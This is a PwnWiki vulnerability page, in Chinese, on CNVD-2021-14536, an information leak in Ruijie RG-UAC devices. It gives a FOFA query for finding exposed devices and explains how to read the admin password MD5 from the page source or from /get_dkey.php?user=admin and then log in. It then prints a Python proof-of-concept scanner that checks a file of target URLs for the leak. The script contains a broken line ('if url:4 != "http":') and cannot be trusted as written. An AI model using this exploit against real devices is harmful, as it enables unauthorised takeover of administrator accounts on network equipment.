Loading
0

CNVD-2021-14536 锐捷RG-UAC信息泄露漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

FOFA

 title="RG-UAC登录页面" && body="admin"

F12查看网页源码搜索关键字admin

或在URL后拼接/get_dkey.php?user=admin

Cnvd1.jpg

使用 password值 md5解密即可登录。(用户名admin)

POC

import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+  \03334mPOC_Des: http://wiki.peiqi.tech                                   \0330m')
    print('+  \03334mVersion: 锐捷RG-UAC统一上网行为管理审计系统                             \0330m')
    print('+  \03336m使用格式:  python3 poc.py                                            \0330m')
    print('+  \03336mFile         >>> ip.txt                             \0330m')
    print('+------------------------------------------')

def POC_1(target_url):
    vuln_url = target_url
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
        if "super_admin" in response.text and "password" in response.text and response.status_code == 200:
            print("\03332mo 目标 {}存在漏洞 ,F12查看源码获取密码md5值 \0330m".format(target_url))
        else:
            print("\03331mx 目标 {}不存在漏洞 \0330m".format(target_url))
    except Exception as e:
        print("\03331mx 目标 {}不存在漏洞 \0330m".format(target_url))

def Scan(file_name):
    with open(file_name, "r", encoding='utf8') as scan_url:
        for url in scan_url:
            if url:4 != "http":
                url = "http://" + url
            url = url.strip('\n')
            try:
                POC_1(url)

            except Exception as e:
                print("\03331mx 请求报错 \0330m".format(e))
                continue

if __name__ == '__main__':
    title()
    file_name  = str(input("\03335mPlease input Attack File\nFile >>> \0330m"))
    Scan(file_name)

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库